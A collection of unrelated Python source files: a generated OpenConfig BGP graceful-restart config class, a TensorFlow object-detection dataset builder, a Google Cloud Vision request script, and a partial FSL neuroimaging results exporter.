Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
YANG Description: Enable or disable the graceful-restart capability.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: Enable or disable the graceful-restart capability.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_restart_time(self):
"""
Getter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertise in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
return self.__restart_time
def _set_restart_time(self, v, load=False):
"""
Setter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_time() directly.
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertise in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..65535"]},
int_size=16,
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_time must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': ['0..4096']}), is_leaf=True, yang_name="restart-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__restart_time = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_time(self):
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_stale_routes_time(self):
"""
Getter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
YANG Description: An upper-bound on the time thate stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
return self.__stale_routes_time
def _set_stale_routes_time(self, v, load=False):
"""
Setter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_stale_routes_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_stale_routes_time() directly.
YANG Description: An upper-bound on the time thate stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """stale_routes_time must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="stale-routes-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=True)""",
}
)
self.__stale_routes_time = t
if hasattr(self, "_set"):
self._set()
def _unset_stale_routes_time(self):
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
def _get_helper_only(self):
"""
Getter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain forwarding
its own state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
return self.__helper_only
def _set_helper_only(self, v, load=False):
"""
Setter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_helper_only is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_helper_only() directly.
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain forwarding
its own state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """helper_only must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="helper-only", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__helper_only = t
if hasattr(self, "_set"):
self._set()
def _unset_helper_only(self):
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
enabled = __builtin__.property(_get_enabled, _set_enabled)
restart_time = __builtin__.property(_get_restart_time, _set_restart_time)
stale_routes_time = __builtin__.property(
_get_stale_routes_time, _set_stale_routes_time
)
helper_only = __builtin__.property(_get_helper_only, _set_helper_only)
_pyangbind_elements = OrderedDict(
[
("enabled", enabled),
("restart_time", restart_time),
("stale_routes_time", stale_routes_time),
("helper_only", helper_only),
]
)
|
|
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tool for converting raw object detection data into the COCO format."""
import abc
import collections
import hashlib
import json
import os
from typing import Any, Generator, Iterable, Mapping, MutableMapping, Optional, Set, Tuple
import six
import tensorflow.compat.v1 as tf
import tensorflow_datasets.public_api as tfds
import image_utils
from object_detection.object_detection_data import bbox_utils
# The Type for a processed example. It is expected to contain the ID and the
# TFDS-compatible map.
ProcessedExample = Tuple[int, Mapping[str, Any]]
_VERSION = '0.1.0'
class ObjectDetectionConfig(tfds.core.BuilderConfig, abc.ABC):
"""Base Class for an input config to ImageClassificationData.
An implementation of ImageClassificationDataConfig includes an example
generator that yields `dict` objects with the essential inputs necessary for
converting raw data into the Object Detection format.
"""
@property
@abc.abstractmethod
def num_labels(self) -> int:
"""The number of distinct labels in the dataset."""
raise NotImplementedError
@property
@abc.abstractmethod
def bbox_format(self) -> bbox_utils.BBoxFormat:
"""Refer to documentation in bbox_utils for more information."""
raise NotImplementedError
@property
@abc.abstractmethod
def supported_modes(self) -> Set[str]:
"""Returns a list of the supported modes for this dataset.
Returns:
A `Set` consisting of a set of 'train', 'test', 'validation'.
"""
raise NotImplementedError
@abc.abstractmethod
def example_generator(self, mode: str):
"""The example generator for the dataset that yields essential inputs.
Args:
mode: `str` indicating the mode. One of the following:
'train', 'validation', 'test'
Yields:
`dict` with the following:
'image_path_or_name': `str` representing the path to the image that is
loadable with `tf.io.gfile.GFile` or the file name. If a file name is
provided instead, then 'image_fobj' must be provided.
'image_fobj': An optional key representing an opened image, (e.g.
open(image_path, 'rb')). This must be provided if 'image_path_or_name'
is not a loadable path.
'image_id': An optional key that can be provided that represents an
integer ID for the image. If not provided, one will be generated,
but note that generated IDs may not be consistent between runs.
'bbox_info': The list of corresponding bounding box information. Each
bounding box should be represented as a dict with keys:
'bbox': the tuple representing a bounding box with the format
specified in `bbox_format`.
'label': the class label of the corresponding bounding box, or the
string representation of the label.
'label_id': An optional field that can be provided if 'label' is
the string representation of the label. If not provided, then an
id will be generated, but note that generated IDs may not be
consistent between runs.
'annotation_id': An optional field that represents the ID of the
bounding box annotation. If not provided, an id will be generated,
but note that generated IDs may not be consistent between runs.
"""
raise NotImplementedError
class ObjectDetectionBuilder(tfds.core.GeneratorBasedBuilder):
"""A TFDS Dataset Builder for Object Detection Datasets.
This Builder processes TFRecords in a COCO style format given an
implementation of ObjectDetectionConfig. It will also create a JSON file
in the same format as COCO.
Example usage:
```
config = [implementation of ObjectDetectionConfig](...)
dataset = ObjectDetectionBuilder(config=config)
dataset.download_and_prepare()
```
"""
VERSION = tfds.core.Version(_VERSION)
def __init__(self,
data_dir: Optional[str] = None,
config: ObjectDetectionConfig = None,
version: Optional[tfds.core.Version] = None,
**kwargs):
"""Refer to `tensorflow_datasets.core.dataset_builder`.
Args:
data_dir: The directory used to save TFDS converted data.
config: The ObjectDetectionConfig implemententation.
version: A TFDS version, if applicable.
**kwargs: Keyword arguments passed to super.
"""
super(ObjectDetectionBuilder, self).__init__(data_dir=data_dir,
config=config,
version=version,
**kwargs)
self._label_id_map = {}
self._id_manager = collections.Counter()
self._json_dict = {}
def _info(self) -> tfds.core.DatasetInfo:
"""Refer to `tensorflow_datasets.core.dataset_builder`."""
if not issubclass(type(self.builder_config), ObjectDetectionConfig):
raise ValueError('Provided config is not the correct type. Please provide'
' a config inheriting ObjectDetectionConfig.')
n_labels = self.builder_config.num_labels
return tfds.core.DatasetInfo(
builder=self,
features=tfds.features.FeaturesDict({
'image': {
'height': tfds.features.Tensor(shape=(), dtype=tf.uint8),
'width': tfds.features.Tensor(shape=(), dtype=tf.uint8),
'filename': tfds.features.Text(),
'source_id': tfds.features.Tensor(shape=(), dtype=tf.int64),
'encoded': tfds.features.Image(encoding_format='jpeg'),
'format': tfds.features.Text(),
'key': {
'sha256': tfds.features.Text(),
},
'object': tfds.features.Sequence({
'bbox': tfds.features.BBoxFeature(),
'class': {
'text': tfds.features.Text(),
'label': tfds.features.ClassLabel(num_classes=n_labels),
}})
}
}))
def _split_generators(
self,
dl_manager: tfds.download.DownloadManager
) -> Iterable[tfds.core.SplitGenerator]:
"""Defines the splits for TFDS builder."""
split_generators = []
if 'train' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={
'mode': 'train',
},
),
)
if 'validation' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs={
'mode': 'validation',
},
),
)
if 'test' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
'mode': 'test',
},
),
)
return split_generators
def _get_id(self, id_family: str) -> int:
"""Simple ID generator based on a counter.
This is a simple ID generator that assigns IDs based on the number of items
counted.
Args:
id_family: The string representation of the 'family' of which to generate
an id.
Returns:
The family member's ID.
"""
res = self._id_manager[id_family]
self._id_manager[id_family] += 1
return res
def _convert_raw_example(
self,
mode_dict: MutableMapping[str, Any],
example: Mapping[str, Any]) -> ProcessedExample:
"""Converts the raw data in the example into a TFDS compatible format.
Args:
mode_dict: `defaultdict(list)` used to populate the COCO style JSON file.
example: A `dict` as specified in ObjectDetectionConfig.
Returns:
A tuple consisting of image_id (`int`) and a `dict` for TFDS.
Raises:
ImageDecodingError if the example image is not formatted properly.
InvalidBBoxError if the example bounding box is not formatted properly.
"""
img_path = example['image_path_or_name']
base_name = os.path.basename(img_path)
img_fobj = example.get('image_fobj', tf.io.gfile.GFile(img_path, 'rb'))
img_bytes, img_shape = image_utils.image_to_jpeg(fobj=img_fobj,
filename=base_name)
img_format = 'JPEG'
key = hashlib.sha256(img_bytes.read()).hexdigest()
img_bytes.seek(0)
bboxes = example['bbox_info']
processed_bboxes = []
img_height = img_shape[0]
img_width = img_shape[1]
img_id = example.get('image_id', self._get_id('image'))
mode_dict['images'].append({
'id': img_id,
'width': img_width,
'height': img_height,
})
for bbox_info in bboxes:
annotations_bbox = bbox_info['bbox']
bbox = bbox_utils.BBox(bbox=annotations_bbox,
fmt=self.builder_config.bbox_format,
img_width=img_width,
img_height=img_height)
label = bbox_info['label']
if isinstance(label, int):
text = str(label)
elif isinstance(label, six.string_types):
text = label
label = bbox_info.get('label_id', self._get_label_id(text))
else:
raise TypeError(
'The provided label was not a string or int. Got: {}'.format(
type(label)))
if label >= self.builder_config.num_labels:
raise ValueError('Provided label {} for {} is greater than '
'the number of classes specified. num_classes: '
'{}'.format(label,
base_name,
self.builder_config.num_labels))
annotation_id = example.get('annotation_id', self._get_id('annotation'))
bbox.convert(bbox_utils.BBoxFormat.NORMALIZED_MIN_MAX)
xmin, xmax, ymin, ymax = bbox.as_tuple()
bbox = bbox.convert(bbox_utils.BBoxFormat.WIDTH_HEIGHT)
mode_dict['annotations'].append({
'id': annotation_id,
'image_id': img_id,
'category_id': label,
'bbox': annotations_bbox,
})
processed_bboxes.append({
'bbox': tfds.features.BBox(ymin=ymin,
xmin=xmin,
ymax=ymax,
xmax=xmax),
'class': {
'text': text,
'label': label,
}
})
return img_id, {
'image': {
'height': img_width,
'width': img_shape[1],
'filename': img_path,
'source_id': img_id,
'encoded': img_bytes,
'format': img_format,
'key': {
'sha256': key,
},
'object': processed_bboxes,
}
}
def _generate_examples(
self, mode: str) -> Generator[ProcessedExample, None, None]:
"""Process specified examples into required TFDS outputs."""
if mode not in self._json_dict:
self._json_dict[mode] = collections.defaultdict(list)
generator = self.builder_config.example_generator(mode)
for example in generator:
img_id, processed_example = self._convert_raw_example(
self._json_dict[mode], example)
yield img_id, processed_example
def _get_label_id(self, label: str) -> int:
"""If the class label was not provided as an int, create the class id."""
try:
return self._label_id_map[label]
except KeyError:
label_id = self._get_id('label')
self._label_id_map[label] = label_id
return label_id
def download_and_prepare(self, **kwargs) -> None:
super(ObjectDetectionBuilder, self).download_and_prepare(**kwargs)
categories_list = list(range(self.builder_config.num_labels))
for mode in self.builder_config.supported_modes:
self._json_dict[mode]['categories'] = categories_list
json_path = os.path.join(self._data_dir, 'instances_{}.json'.format(mode))
with open(json_path, 'w') as f:
json.dump(self._json_dict[mode], f)
tf.logging.info('Created JSON file {}'.format(json_path))
|
|
#!/usr/bin/env python
"""sorno_cloud_vision.py makes using the Google Cloud Vision API easier.
Doc: https://cloud.google.com/vision/docs
The script generates requests for the given photos, sends the requests to Cloud
Vision, then puts the results into the corresponding response files.
Copyright 2016 Heung Ming Tai
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import argparse
import base64
import httplib2
import json
import logging
import os
import sys
from apiclient import discovery
import humanfriendly
from oauth2client import client as oauthclient
from sorno import loggingutil
_log = logging.getLogger()
_plain_logger = None # will be created in main()
_plain_error_logger = None # will be created in main()
class CloudVisionApp(object):
"""A console application to do work"""
def __init__(
self,
args,
):
"""
Args:
args (argparse.Namespace): The flags for the script.
"""
self.args = args
self.http = None
# Endpoint for accessing the cloud vision api with api key
self.endpoint = None
# Google api client
self.service = None
def run(self):
use_api_key = False
self.http = httplib2.Http()
if self.args.api_key:
self.endpoint = (
"https://vision.googleapis.com/v1/images:annotate?key=" +
self.args.api_key
)
use_api_key = True
if not use_api_key:
if not os.getenv("GOOGLE_APPLICATION_CREDENTIALS"):
_plain_error_logger.fatal(
"You need to specify --api-key or set the"
" environment variable GOOGLE_APPLICATION_CREDENTIALS."
" See https://cloud.google.com/vision/docs/getting-started."
)
sys.exit(1)
credentials = oauthclient.GoogleCredentials.get_application_default(
).create_scoped(
['https://www.googleapis.com/auth/cloud-platform']
)
credentials.authorize(self.http)
api_discovery_file = (
'https://vision.googleapis.com/$discovery/rest?version=v1'
)
self.service = discovery.build(
'vision',
'v1',
http=self.http,
discoveryServiceUrl=api_discovery_file,
)
getsize = os.path.getsize
size_limit = None
if self.args.size_limit:
size_limit = humanfriendly.parse_size(self.args.size_limit)
_log.info("Size limit is %s bytes", "{:,}".format(size_limit))
for f in self.args.files:
_log.info("Process photo: %s", f)
if size_limit:
size = getsize(f)
_log.info(
"File size is %s, greater than the limit %s, skipped",
"{:,}".format(size),
"{:,}".format(size_limit),
)
continue
with open(f, "rb") as image:
image_content = base64.b64encode(image.read())
if use_api_key:
resp_content = self._process_with_api_key(image_content)
else:
resp_content = self._process_with_credentials(image_content)
output_filepath = f + ".output.txt"
_log.info("Writing output for %s to %s", f, output_filepath)
with open(output_filepath, "w") as output:
output.write(
resp_content.decode("unicode-escape").encode("utf8")
)
return 0
def _process_with_api_key(self, image_content):
service_request_json = json.dumps(
self._create_request_body(image_content)
)
if self.args.debug:
self._write_request_for_debug(service_request_json)
(resp, content) = self.http.request(
self.endpoint,
"POST",
headers={
'Content-Type': "application/json",
},
body=service_request_json,
)
_log.info("Response: %s", resp)
return content
def _process_with_credentials(self, image_content):
request = self._create_request_body(image_content)
if self.args.debug:
self._write_request_for_debug(json.dumps(request, indent=4))
client_request = self.service.images().annotate(body=request)
response = client_request.execute()
return json.dumps(response, indent=4)
def _write_request_for_debug(self, request_json):
request_filepath = "cloud-vision-request.json"
_log.info("Writing request to %s", request_filepath)
with open(request_filepath, "w") as f:
f.write(request_json)
def _create_request_body(self, image_content):
return {
'requests': [
{
'image': {
'content': image_content
},
'features': [
{
'type': "LABEL_DETECTION",
"maxResults": 20,
},
{
'type': "TEXT_DETECTION",
"maxResults": 5,
},
# {
# 'type': "FACE_DETECTION",
# "maxResults": 10,
# },
{
'type': "LANDMARK_DETECTION",
"maxResults": 3,
},
{
'type': "LOGO_DETECTION",
"maxResults": 5,
},
{
'type': "SAFE_SEARCH_DETECTION",
"maxResults": 10,
},
# {
# 'type': "IMAGE_PROPERTIES",
# "maxResults": 10,
# },
]
},
]
}
def parse_args(cmd_args):
description = __doc__.split("Copyright 2016")[0].strip()
parser = argparse.ArgumentParser(
description=description,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--debug",
action="store_true",
)
parser.add_argument(
"--api-key",
)
parser.add_argument(
"--size-limit",
help="Skip files which have size higher than this limit."
" Cloud Vision only supports up to 4MB. You can use any string that"
" represents a size like '4MB', '3K', '5G'.",
)
parser.add_argument(
"files",
metavar='file',
nargs="+",
)
args = parser.parse_args(cmd_args)
return args
def main():
global _plain_logger, _plain_error_logger
args = parse_args(sys.argv[1:])
loggingutil.setup_logger(_log, debug=args.debug)
_plain_logger = loggingutil.create_plain_logger(
"PLAIN",
debug=args.debug,
)
_plain_error_logger = loggingutil.create_plain_logger(
"PLAIN_ERROR",
debug=args.debug,
stdout=False,
)
app = CloudVisionApp(
args,
)
sys.exit(app.run())
if __name__ == '__main__':
main()
|
|
"""
Export neuroimaging results created with feat in FSL following NIDM-Results
specification.
@author: Camille Maumet <[email protected]>
@copyright: University of Warwick 2013-2014
"""
import re
import os
import sys
import glob
import json
import numpy as np
import subprocess
import warnings
# If "nidmresults" code is available locally work on the source code (used
# only for development)
FSL_EXPORTER_DIR = os.path.dirname(os.path.realpath(__file__))
NIDM_FSL_DIR = os.path.dirname(FSL_EXPORTER_DIR)
NIDM_RESULTS_FSL_DIR = os.path.dirname(NIDM_FSL_DIR)
NIDM_RESULTS_SRC_DIR = os.path.join(
os.path.dirname(NIDM_RESULTS_FSL_DIR), "nidmresults")
if os.path.isdir(NIDM_RESULTS_SRC_DIR):
sys.path.append(NIDM_RESULTS_SRC_DIR)
from nidmresults.exporter import NIDMExporter
from nidmresults.objects.constants import *
from nidmresults.objects.modelfitting import *
from nidmresults.objects.contrast import *
from nidmresults.objects.inference import *
from nidmfsl.fsl_exporter.objects.fsl_objects import *
class FSLtoNIDMExporter(NIDMExporter, object):
"""
Parse an FSL result directory to extract the pieces information to be
stored in NIDM-Results and generate a NIDM-Results export.
"""
def __init__(self, *args, **kwargs):
super(FSLtoNIDMExporter, self).__init__()
self.feat_dir = kwargs.pop('feat_dir')
nidm_dirs = glob.glob(os.path.join(self.feat_dir, 'nidm****'))
if nidm_dirs:
if nidm_dirs[-1] == os.path.join(self.feat_dir, 'nidm'):
export_dir_num = 1
else:
m = re.search('(?<=nidm_).*', nidm_dirs[-1])
export_dir_num = int(m.group(0)) + 1
self.export_dir = os.path.join(
self.feat_dir, 'nidm' + "_{0:0>4}".format(export_dir_num))
else:
self.export_dir = os.path.join(self.feat_dir, 'nidm')
self.design_file = os.path.join(self.feat_dir, 'design.fsf')
# FIXME: maybe not always "4"?
feat_post_log_file = os.path.join(self.feat_dir, 'logs', 'feat4_post')
# FIXME: this file is sometimes missing, can the connectivity info
# be retreive from somewhere else??
if os.path.isfile(feat_post_log_file):
self.feat_post_log = open(feat_post_log_file, 'r')
else:
self.feat_post_log = None
self.version = kwargs.pop('version')
self.coord_space = None
self.contrast_names_by_num = dict()
def parse(self):
"""
Parse an FSL result directory to extract the pieces information to be
stored in NIDM-Results.
"""
# Load design.fsf file
design_file_open = open(self.design_file, 'r')
self.design_txt = design_file_open.read()
# Load feat post log file
if self.feat_post_log is not None:
self.feat_post_log = self.feat_post_log.read()
fmri_level_re = r'.*set fmri\(level\) (?P<info>\d+).*'
fmri_level = int(self._search_in_fsf(fmri_level_re))
self.first_level = (fmri_level == 1)
# FIXME cope1
if self.first_level:
# stat_dir = list([os.path.join(self.feat_dir, 'stats')])
self.analysis_dirs = list([self.feat_dir])
else:
# If feat was called with the GUI then the analysis directory is in
# the nested cope folder
self.analysis_dirs = glob.glob(
os.path.join(self.feat_dir, 'cope*.feat'))
if not self.analysis_dirs:
self.analysis_dirs = list([self.feat_dir])
# cope_dirs
# print cope_dirs
# stat_dir = os.path.join(self.feat_dir, 'cope1.feat', 'stats')
# analysis_dir = os.path.join(self.feat_dir, 'cope1.feat')
super(FSLtoNIDMExporter, self).parse()
def _add_namespaces(self):
"""
Overload of parent _add_namespaces to add FSL namespace.
"""
super(FSLtoNIDMExporter, self)._add_namespaces()
self.doc.add_namespace(FSL)
def _find_software(self):
"""
Return an object of type Software describing the version of FSL used to
compute the current analysis.
"""
version_re = r'.*set fmri\(version\) (?P<info>\d+\.?\d+).*'
feat_version = self._search_in_fsf(version_re)
software = Software(feat_version=feat_version)
return software
def _find_model_fitting(self):
"""
Parse FSL result directory to retreive model fitting information.
Return a list of objects of type ModelFitting.
"""
self.model_fittings = dict()
for analysis_dir in self.analysis_dirs:
stat_dir = os.path.join(analysis_dir, 'stats')
design_matrix = self._get_design_matrix(analysis_dir)
data = self._get_data()
error_model = self._get_error_model()
rms_map = self._get_residual_mean_squares_map(stat_dir)
param_estimates = self._get_param_estimate_maps(stat_dir)
mask_map = self._get_mask_map(analysis_dir)
grand_mean_map = self._get_grand_mean(mask_map.file, analysis_dir)
activity = self._get_model_parameters_estimations(error_model)
model_fitting = ModelFitting(
activity, design_matrix, data,
error_model, param_estimates, rms_map, mask_map,
grand_mean_map)
self.model_fittings[analysis_dir] = model_fitting
return self.model_fittings
def _find_contrasts(self):
"""
Parse FSL result directory to retreive information about contrasts.
Return a dictionary of (key, value) pairs where key is a tuple
containing the identifier of a ModelParametersEstimation object and a
tuple of identifiers of ParameterEstimateMap objects, and value is an
object of type Contrast.
"""
for analysis_dir in self.analysis_dirs:
# Retreive the Model Parameters Estimations activity corresponding
# to current analysis directory.
mf_id = self.model_fittings[analysis_dir].activity.id
stat_dir = os.path.join(analysis_dir, 'stats')
# Degrees of freedom
# FIXME: check what happens when more than one contrast is
# performed
dof_file = open(os.path.join(stat_dir, 'dof'), 'r')
dof = float(dof_file.read())
exc_sets = glob.glob(os.path.join(analysis_dir,
'thresh_z*.nii.gz'))
contrasts = dict()
for filename in exc_sets:
s = re.compile('zf?stat\d+')
zstatnum = s.search(filename)
zstatnum = zstatnum.group()
if zstatnum.startswith("zstat"):
stat_type = "T"
con_num = zstatnum.replace('zstat', '')
elif zstatnum.startswith("zfstat"):
stat_type = "F"
con_num = zstatnum.replace('zfstat', '')
# If more than one excursion set is reported, we need to
# use an index in the file names of the file exported in
# nidm
if len(exc_sets) > 1:
stat_num = "_" + \
stat_type.upper() + "{0:0>3}".format(con_num)
else:
stat_num = ""
# Contrast name
name_re = r'.*set fmri\(conname_real\.' + con_num +\
'\) "(?P<info>[^"]+)".*'
contrast_name = self._search_in_fsf(name_re)
self.contrast_names_by_num[con_num] = contrast_name
# Contrast estimation activity
estimation = ContrastEstimation(con_num, contrast_name)
# Contrast weights
weights_re = r'.*set fmri\(con_real' + con_num +\
'\.\d+\) (?P<info>-?\d+)'
weight_search = re.compile(weights_re)
contrast_weights = str(
re.findall(weight_search,
self.design_txt)).replace("'", '')
weights = ContrastWeights(stat_num, contrast_name,
contrast_weights, stat_type)
# Find which parameter estimates were used to compute the
# contrast
pe_ids = list()
pe_index = 1
contrast_weights = contrast_weights.replace(' ', '')
contrast_weights = contrast_weights.replace('[', '')
contrast_weights = contrast_weights.replace(']', '')
contrast_weights = contrast_weights.split(',')
# Whenever a "1" is found in contrast_weights, the
# parameter estimate map identified by the corresponding
# index is in use
for beta_index in contrast_weights:
if int(beta_index) == 1:
for model_fitting in self.model_fittings.values():
for pe in model_fitting.param_estimates:
s = re.compile('pe\d+')
pe_num = s.search(pe.file)
pe_num = pe_num.group()
pe_num = pe_num.replace('pe', '')
if pe_num == pe_index:
pe_ids.append(pe.id)
pe_index += 1
# Convert to immutable tuple to be used as key
pe_ids = tuple(pe_ids)
# Statistic Map
stat_file = os.path.join(
stat_dir,
stat_type.lower() + 'stat' + str(con_num) + '.nii.gz')
stat_map = StatisticMap(
stat_file, stat_type, stat_num,
contrast_name, dof, self.coord_space,
self.export_dir)
# Z-Statistic Map
z_stat_file = os.path.join(
stat_dir,
'zstat' + str(con_num) + '.nii.gz')
z_stat_map = StatisticMap(
z_stat_file, 'Z', stat_num,
contrast_name, dof, self.coord_space,
self.export_dir)
if stat_type is "T":
# Contrast Map
con_file = os.path.join(stat_dir,
'cope' + str(con_num) + '.nii.gz')
contrast_map = ContrastMap(con_file, stat_num,
contrast_name, self.coord_space,
self.export_dir)
# Contrast Variance and Standard Error Maps
varcontrast_file = os.path.join(
stat_dir, 'varcope' + str(con_num) + '.nii.gz')
is_variance = True
